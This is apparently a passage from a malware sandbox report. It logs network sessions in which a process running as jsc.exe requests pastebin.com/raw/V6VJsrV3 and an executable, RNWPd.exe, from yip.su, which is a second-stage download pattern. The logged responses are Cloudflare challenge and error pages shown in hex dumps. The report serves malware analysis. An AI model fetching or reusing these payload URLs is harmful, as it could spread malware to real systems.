                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:52 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:52 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
                                    2024-08-17 22:08:52 UTC1369INData Raw: 69 67 6e 3a 63 65 6e 74 65 72 7d 2e 63 6f 6c 75 6d 6e 7b 70 61 64 64 69 6e 67 2d 62 6f 74 74 6f 6d 3a 32 72 65 6d 7d 2e 63 6c 65 61 72 66 69 78 20 2e 63 6f 6c 75 6d 6e 7b 66 6c 6f 61 74 3a 6e 6f 6e 65 3b 70 61 64 64 69 6e 67 3a 30 3b 77 69 64 74 68 3a 61 75 74 6f 3b 77 6f 72 64 2d 62 72 65 61 6b 3a 6b 65 65 70 2d 61 6c 6c 7d 2e 7a 6f 6e 65 2d 6e 61 6d 65 2d 74 69 74 6c 65 7b 6d 61 72 67 69 6e 2d 62 6f 74 74 6f 6d 3a 31 72 65 6d 7d 7d 2e 6c 6f 61 64 69 6e 67 2d 73 70 69 6e 6e 65 72 7b 68 65 69 67 68 74 3a 37 36 2e 33 39 31 70 78 7d 2e 6c 64 73 2d 72 69 6e 67 7b 64 69 73 70 6c 61 79 3a 69 6e 6c 69 6e 65 2d 62 6c 6f 63 6b 3b 70 6f 73 69 74 69 6f 6e 3a 72 65 6c 61 74 69 76 65 7d 2e 6c 64 73 2d 72 69 6e 67 2c 2e 6c 64 73 2d 72 69 6e 67 20 64 69 76 7b 68 65 69
                                    Data Ascii: ign:center}.column{padding-bottom:2rem}.clearfix .column{float:none;padding:0;width:auto;word-break:keep-all}.zone-name-title{margin-bottom:1rem}}.loading-spinner{height:76.391px}.lds-ring{display:inline-block;position:relative}.lds-ring,.lds-ring div{hei
                                    2024-08-17 22:08:52 UTC1369INData Raw: 69 6f 6e 28 29 7b 77 69 6e 64 6f 77 2e 5f 63 66 5f 63 68 6c 5f 6f 70 74 3d 7b 63 76 49 64 3a 20 27 33 27 2c 63 5a 6f 6e 65 3a 20 22 79 69 70 2e 73 75 22 2c 63 54 79 70 65 3a 20 27 6d 61 6e 61 67 65 64 27 2c 63 4e 6f 75 6e 63 65 3a 20 27 37 39 35 36 37 27 2c 63 52 61 79 3a 20 27 38 62 34 63 66 63 33 36 31 61 64 37 34 33 36 65 27 2c 63 48 61 73 68 3a 20 27 31 33 66 30 31 31 64 31 35 31 62 39 34 32 65 27 2c 63 55 50 4d 44 54 6b 3a 20 22 5c 2f 52 4e 57 50 64 2e 65 78 65 3f 5f 5f 63 66 5f 63 68 6c 5f 74 6b 3d 4a 54 64 69 73 37 54 6c 76 70 4d 77 57 42 71 70 6d 58 5a 38 59 75 57 62 65 6d 50 4c 6f 53 33 2e 4f 78 76 50 4d 2e 67 42 30 58 4d 2d 31 37 32 33 39 33 32 35 33 32 2d 30 2e 30 2e 31 2e 31 2d 34 31 33 37 22 2c 63 46 50 57 76 3a 20 27 67 27 2c 63 54 54 69 6d
                                    Data Ascii: ion(){window._cf_chl_opt={cvId: '3',cZone: "yip.su",cType: 'managed',cNounce: '79567',cRay: '8b4cfc361ad7436e',cHash: '13f011d151b942e',cUPMDTk: "\/RNWPd.exe?__cf_chl_tk=JTdis7TlvpMwWBqpmXZ8YuWbemPLoS3.OxvPM.gB0XM-1723932532-0.0.1.1-4137",cFPWv: 'g',cTTim
                                    2024-08-17 22:08:52 UTC1369INData Raw: 66 38 70 54 32 4a 64 61 65 4d 68 2e 32 32 78 59 4a 4e 6e 58 45 63 6b 51 4f 62 7a 65 4f 57 32 69 79 59 64 77 6d 73 64 6e 39 41 4c 7a 53 30 35 45 59 32 38 69 59 4c 52 59 65 31 73 76 66 4f 45 67 4b 54 49 68 5a 46 4e 42 75 6f 44 77 4e 76 32 75 72 55 50 71 78 5a 48 35 6a 35 61 6e 69 5a 69 34 62 6f 75 7a 55 68 66 53 4d 68 33 4b 75 73 4b 71 37 2e 38 69 46 42 71 35 36 43 35 4a 4f 43 47 58 51 45 68 4f 68 70 63 68 2e 6a 42 73 38 55 7a 6b 34 4b 6c 78 53 51 77 71 55 71 71 36 74 4d 67 6c 52 6d 7a 77 42 30 54 6f 42 4f 67 4d 50 65 48 6a 56 39 56 79 31 61 37 6d 38 4b 36 4d 74 66 35 54 2e 6c 36 6e 4b 36 4d 35 2e 31 72 4b 4c 58 51 79 5a 46 49 66 42 47 73 66 52 6b 56 70 64 62 46 45 33 4f 76 77 69 4d 74 57 6c 6c 6b 65 54 55 49 69 49 58 38 43 55 63 37 2e 33 79 53 6a 32 43 58
                                    Data Ascii: f8pT2JdaeMh.22xYJNnXEckQObzeOW2iyYdwmsdn9ALzS05EY28iYLRYe1svfOEgKTIhZFNBuoDwNv2urUPqxZH5j5aniZi4bouzUhfSMh3KusKq7.8iFBq56C5JOCGXQEhOhpch.jBs8Uzk4KlxSQwqUqq6tMglRmzwB0ToBOgMPeHjV9Vy1a7m8K6Mtf5T.l6nK6M5.1rKLXQyZFIfBGsfRkVpdbFE3OvwiMtWllkeTUIiIX8CUc7.3ySj2CX


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    18192.168.2.549741104.20.4.2354437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:57 UTC74OUTGET /raw/V6VJsrV3 HTTP/1.1
                                    Host: pastebin.com
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:57 UTC222INHTTP/1.1 200 OK
                                    Date: Sat, 17 Aug 2024 22:08:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    X-Frame-Options: SAMEORIGIN
                                    Server: cloudflare
                                    CF-RAY: 8b4cfc561e7c8c12-EWR
                                    2024-08-17 22:08:57 UTC1147INData Raw: 31 31 33 36 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 36 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 37 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 37 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20 49 45 20 38 5d 3e 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 69 65 38 20 6f 6c 64 69 65 22 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 20 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 3c 21 2d 2d 5b 69 66 20
                                    Data Ascii: 1136<!DOCTYPE html>...[if lt IE 7]> <html class="no-js ie6 oldie" lang="en-US"> <![endif]-->...[if IE 7]> <html class="no-js ie7 oldie" lang="en-US"> <![endif]-->...[if IE 8]> <html class="no-js ie8 oldie" lang="en-US"> <![endif]-->...[if
                                    2024-08-17 22:08:57 UTC1369INData Raw: 21 2d 2d 3c 21 5b 65 6e 64 69 66 5d 2d 2d 3e 0a 0a 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 77 72 61 70 70 65 72 22 3e 0a 20 20 20 20 3c 64 69 76 20 63 6c 61 73 73 3d 22 63 66 2d 61 6c 65 72 74 20 63 66 2d 61 6c 65 72 74 2d 65 72 72 6f 72 20 63 66 2d 63 6f 6f 6b 69 65 2d 65 72 72 6f 72 22 20 69 64 3d 22 63 6f 6f 6b 69 65 2d 61 6c 65 72 74 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 65 6e 61 62 6c 65 5f 63 6f 6f 6b 69 65 73 22 3e 50 6c 65 61 73 65 20 65 6e 61 62 6c 65 20 63 6f 6f 6b 69 65 73 2e 3c 2f 64 69 76 3e 0a 20 20 20 20 3c 64 69 76 20 69 64 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 22 20 63 6c 61 73 73 3d 22 63 66 2d 65 72 72 6f 72 2d 64 65 74 61 69 6c 73 2d 77 72 61 70 70 65 72
                                    Data Ascii: !--<![endif]--></head><body> <div id="cf-wrapper"> <div class="cf-alert cf-alert-error cf-cookie-error" id="cookie-alert" data-translate="enable_cookies">Please enable cookies.</div> <div id="cf-error-details" class="cf-error-details-wrapper
                                    2024-08-17 22:08:57 UTC1369INData Raw: 72 65 3c 2f 61 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 62 75 74 74 6f 6e 20 74 79 70 65 3d 22 73 75 62 6d 69 74 22 20 63 6c 61 73 73 3d 22 63 66 2d 62 74 6e 20 63 66 2d 62 74 6e 2d 64 61 6e 67 65 72 22 20 73 74 79 6c 65 3d 22 63 6f 6c 6f 72 3a 20 23 62 64 32 34 32 36 3b 20 62 61 63 6b 67 72 6f 75 6e 64 3a 20 74 72 61 6e 73 70 61 72 65 6e 74 3b 22 20 64 61 74 61 2d 74 72 61 6e 73 6c 61 74 65 3d 22 64 69 73 6d 69 73 73 5f 61 6e 64 5f 65 6e 74 65 72 22 3e 49 67 6e 6f 72 65 20 26 20 50 72 6f 63 65 65 64 3c 2f 62 75 74 74 6f 6e 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 66 6f 72 6d 3e 0a 20 20 20 20 20 20 20 20 20 20 20 20 3c 2f 70 3e 0a 20 20 20 20 20 20 20 20 20 20 3c 2f 64 69 76
                                    Data Ascii: re</a> <button type="submit" class="cf-btn cf-btn-danger" style="color: #bd2426; background: transparent;" data-translate="dismiss_and_enter">Ignore & Proceed</button> </form> </p> </div
                                    2024-08-17 22:08:57 UTC529INData Raw: 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 74 65 6d 2d 69 70 22 29 2c 63 3d 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 2d 72 65 76 65 61 6c 22 29 3b 62 26 26 22 63 6c 61 73 73 4c 69 73 74 22 69 6e 20 62 26 26 28 62 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 2c 63 2e 61 64 64 45 76 65 6e 74 4c 69 73 74 65 6e 65 72 28 22 63 6c 69 63 6b 22 2c 66 75 6e 63 74 69 6f 6e 28 29 7b 63 2e 63 6c 61 73 73 4c 69 73 74 2e 61 64 64 28 22 68 69 64 64 65 6e 22 29 3b 61 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 22 63 66 2d 66 6f 6f 74 65 72 2d 69 70 22 29 2e 63 6c 61 73 73 4c 69 73 74 2e 72 65 6d 6f 76 65 28 22 68 69 64 64 65 6e 22 29 7d 29 29 7d 76
                                    Data Ascii: etElementById("cf-footer-item-ip"),c=a.getElementById("cf-footer-ip-reveal");b&&"classList"in b&&(b.classList.remove("hidden"),c.addEventListener("click",function(){c.classList.add("hidden");a.getElementById("cf-footer-ip").classList.remove("hidden")}))}v
                                    2024-08-17 22:08:57 UTC5INData Raw: 30 0d 0a 0d 0a
                                    Data Ascii: 0


                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                    19192.168.2.549742188.114.96.34437248C:\Windows\Microsoft.NET\Framework\v4.0.30319\jsc.exe
                                    TimestampBytes transferredDirectionData
                                    2024-08-17 22:08:57 UTC65OUTGET /RNWPd.exe HTTP/1.1
                                    Host: yip.su
                                    Connection: Keep-Alive
                                    2024-08-17 22:08:57 UTC1285INHTTP/1.1 403 Forbidden
                                    Date: Sat, 17 Aug 2024 22:08:57 GMT
                                    Content-Type: text/html; charset=UTF-8
                                    Transfer-Encoding: chunked
                                    Connection: close
                                    Accept-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Critical-CH: Sec-CH-UA-Bitness, Sec-CH-UA-Arch, Sec-CH-UA-Full-Version, Sec-CH-UA-Mobile, Sec-CH-UA-Model, Sec-CH-UA-Platform-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Platform, Sec-CH-UA, UA-Bitness, UA-Arch, UA-Full-Version, UA-Mobile, UA-Model, UA-Platform-Version, UA-Platform, UA
                                    Cross-Origin-Embedder-Policy: require-corp
                                    Cross-Origin-Opener-Policy: same-origin
                                    Cross-Origin-Resource-Policy: same-origin
                                    Origin-Agent-Cluster: ?1
                                    Permissions-Policy: accelerometer=(),autoplay=(),browsing-topics=(),camera=(),clipboard-read=(),clipboard-write=(),geolocation=(),gyroscope=(),hid=(),interest-cohort=(),magnetometer=(),microphone=(),payment=(),publickey-credentials-get=(),screen-wake-lock=(),serial=(),sync-xhr=(),usb=()
                                    Referrer-Policy: same-origin
                                    X-Content-Options: nosniff
                                    X-Frame-Options: SAMEORIGIN
                                    cf-mitigated: challenge
                                    2024-08-17 22:08:57 UTC681INData Raw: 63 66 2d 63 68 6c 2d 6f 75 74 3a 20 2b 4d 61 68 4e 59 71 6b 6f 34 6d 62 35 4e 59 78 33 58 36 72 71 6d 4f 5a 4f 37 54 6a 75 64 59 6d 7a 6d 67 74 47 34 35 32 50 69 51 73 44 41 39 33 4b 4c 65 37 4d 4c 55 52 2f 77 35 64 59 56 4f 74 47 4b 69 78 47 79 45 44 2b 5a 2f 57 30 2b 70 7a 66 2f 54 34 71 2b 35 31 46 34 4f 6d 69 51 73 70 66 61 48 42 2f 48 4b 4d 6e 73 73 3d 24 74 4c 49 34 2b 34 44 52 79 4e 4d 36 41 6e 77 7a 48 76 31 32 4b 41 3d 3d 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 70 72 69 76 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 2c 20 6e 6f 2d 73 74 6f 72 65 2c 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 70 6f 73 74 2d 63 68 65 63 6b 3d 30 2c 20 70 72 65 2d 63 68 65 63 6b 3d 30 0d 0a 45 78 70 69 72 65 73 3a 20
                                    Data Ascii: cf-chl-out: +MahNYqko4mb5NYx3X6rqmOZO7TjudYmzmgtG452PiQsDA93KLe7MLUR/w5dYVOtGKixGyED+Z/W0+pzf/T4q+51F4OmiQspfaHB/HKMnss=$tLI4+4DRyNM6AnwzHv12KA==Cache-Control: private, max-age=0, no-store, no-cache, must-revalidate, post-check=0, pre-check=0Expires:
                                    2024-08-17 22:08:57 UTC1369INData Raw: 33 64 65 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4a 75 73 74 20 61 20 6d 6f 6d 65 6e 74 2e 2e 2e 3c 2f 74 69 74 6c 65 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 43 6f 6e 74 65 6e 74 2d 54 79 70 65 22 20 63 6f 6e 74 65 6e 74 3d 22 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 22 3e 3c 6d 65 74 61 20 68 74 74 70 2d 65 71 75 69 76 3d 22 58 2d 55 41 2d 43 6f 6d 70 61 74 69 62 6c 65 22 20 63 6f 6e 74 65 6e 74 3d 22 49 45 3d 45 64 67 65 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 3e 3c 6d 65 74 61 20 6e 61 6d 65 3d
                                    Data Ascii: 3de7<!DOCTYPE html><html lang="en-US"><head><title>Just a moment...</title><meta http-equiv="Content-Type" content="text/html; charset=UTF-8"><meta http-equiv="X-UA-Compatible" content="IE=Edge"><meta name="robots" content="noindex,nofollow"><meta name=
                                    2024-08-17 22:08:57 UTC1369INData Raw: 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64 2d 69 6d 61 67 65 3a 75 72 6c 28 64 61 74 61 3a 69 6d 61 67 65 2f 73 76 67 2b 78 6d 6c 3b 62 61 73 65 36 34 2c 50 48 4e 32 5a 79 42 34 62 57 78 75 63 7a 30 69 61 48 52 30 63 44 6f 76 4c 33 64 33 64 79 35 33 4d 79 35 76 63 6d 63 76 4d 6a 41 77 4d 43 39 7a 64 6d 63 69 49 48 64 70 5a 48 52 6f 50 53 49 7a 4d 69 49 67 61 47 56 70 5a 32 68 30 50 53 49 7a 4d 69 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 2b 50 48 42 68 64 47 67 67 5a 6d 6c 73 62 44 30 69 49 30 49 79 4d 45 59 77 4d 79 49 67 5a 44 30 69 54 54 45 32 49 44 4e 68 4d 54 4d 67 4d 54 4d 67 4d 43 41 78 49 44 41 67 4d
                                    Data Ascii: 0xLjQwNXoiLz48L3N2Zz4=)}body #challenge-error-text{background-image:url(data:image/svg+xml;base64,PHN2ZyB4bWxucz0iaHR0cDovL3d3dy53My5vcmcvMjAwMC9zdmciIHdpZHRoPSIzMiIgaGVpZ2h0PSIzMiIgZmlsbD0ibm9uZSI+PHBhdGggZmlsbD0iI0IyMEYwMyIgZD0iTTE2IDNhMTMgMTMgMCAxIDAgM
                                    2024-08-17 22:08:57 UTC1369INData Raw: 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 5a 44 6c 6b 4f 57 51 35 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41 35 4c 6a 51 35 4e 53 30 35 4c 6a 59 74 4d 53 34 30 4d 69 30 78 4c 6a 51 77 4e 58 6f 69 4c 7a 34 38 4c 33 4e 32 5a 7a 34 3d 29 7d 62 6f 64 79 2e 64 61 72 6b 20 23 63 68 61 6c 6c 65 6e 67 65 2d 65 72 72 6f 72 2d 74 65 78 74 7b 62 61 63 6b 67 72 6f 75 6e 64
                                    Data Ascii: DEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjZDlkOWQ5IiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA5LjQ5NS05LjYtMS40Mi0xLjQwNXoiLz48L3N2Zz4=)}body.dark #challenge-error-text{background
                                    2024-08-17 22:08:57 UTC1369INData Raw: 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e 44 51 31 49 44 45 75 4d 7a 67 31 49 44 55 75 4d 7a 63 67 4e 53 34 32 4d 53 41
                                    Data Ascii: eD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuNDQ1IDEuMzg1IDUuMzcgNS42MSA
                                    2024-08-17 22:08:57 UTC1369INData Raw: 70 70 65 72 7b 61 6c 69 67 6e 2d 69 74 65 6d 73 3a 63 65 6e 74 65 72 3b 64 69 73 70 6c 61 79 3a 66 6c 65 78 3b 66 6c 65 78 3a 31 3b 66 6c 65 78 2d 64 69 72 65 63 74 69 6f 6e 3a 63 6f 6c 75 6d 6e 7d 2e 66 6f 6e 74 2d 72 65 64 7b 63 6f 6c 6f 72 3a 23 62 32 30 66 30 33 7d 2e 73 70 61 63 65 72 7b 6d 61 72 67 69 6e 3a 32 72 65 6d 20 30 7d 2e 68 31 7b 66 6f 6e 74 2d 73 69 7a 65 3a 32 2e 35 72 65 6d 3b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 33 2e 37 35 72 65 6d 7d 2e 68 32 7b 66 6f 6e 74 2d 77 65 69 67 68 74 3a 35 30 30 7d 2e 63 6f 72 65 2d 6d 73 67 2c 2e 68 32 7b 66 6f 6e 74 2d 73 69 7a 65 3a 31 2e 35 72 65 6d 3b 6c 69 6e 65 2d 68 65 69 67 68 74 3a 32 2e 32 35 72 65 6d 7d 2e 62 6f 64 79 2d 74 65 78 74 2c 2e 63 6f 72
                                    Data Ascii: pper{align-items:center;display:flex;flex:1;flex-direction:column}.font-red{color:#b20f03}.spacer{margin:2rem 0}.h1{font-size:2.5rem;font-weight:500;line-height:3.75rem}.h2{font-weight:500}.core-msg,.h2{font-size:1.5rem;line-height:2.25rem}.body-text,.cor
                                    2024-08-17 22:08:57 UTC1369INData Raw: 49 67 5a 6d 6c 73 62 44 30 69 62 6d 39 75 5a 53 49 67 64 6d 6c 6c 64 30 4a 76 65 44 30 69 4d 43 41 77 49 44 49 32 49 44 49 32 49 6a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 4e 4d 54 4d 67 4d 47 45 78 4d 79 41 78 4d 79 41 77 49 44 45 67 4d 43 41 77 49 44 49 32 49 44 45 7a 49 44 45 7a 49 44 41 67 4d 43 41 77 49 44 41 74 4d 6a 5a 74 4d 43 41 79 4e 47 45 78 4d 53 41 78 4d 53 41 77 49 44 45 67 4d 53 41 77 4c 54 49 79 49 44 45 78 49 44 45 78 49 44 41 67 4d 43 41 78 49 44 41 67 4d 6a 49 69 4c 7a 34 38 63 47 46 30 61 43 42 6d 61 57 78 73 50 53 49 6a 4d 7a 45 7a 4d 54 4d 78 49 69 42 6b 50 53 4a 74 4d 54 41 75 4f 54 55 31 49 44 45 32 4c 6a 41 31 4e 53 30 7a 4c 6a 6b 31 4c 54 51 75 4d 54 49 31 4c 54 45 75 4e
                                    Data Ascii: IgZmlsbD0ibm9uZSIgdmlld0JveD0iMCAwIDI2IDI2Ij48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJNMTMgMGExMyAxMyAwIDEgMCAwIDI2IDEzIDEzIDAgMCAwIDAtMjZtMCAyNGExMSAxMSAwIDEgMSAwLTIyIDExIDExIDAgMCAxIDAgMjIiLz48cGF0aCBmaWxsPSIjMzEzMTMxIiBkPSJtMTAuOTU1IDE2LjA1NS0zLjk1LTQuMTI1LTEuN
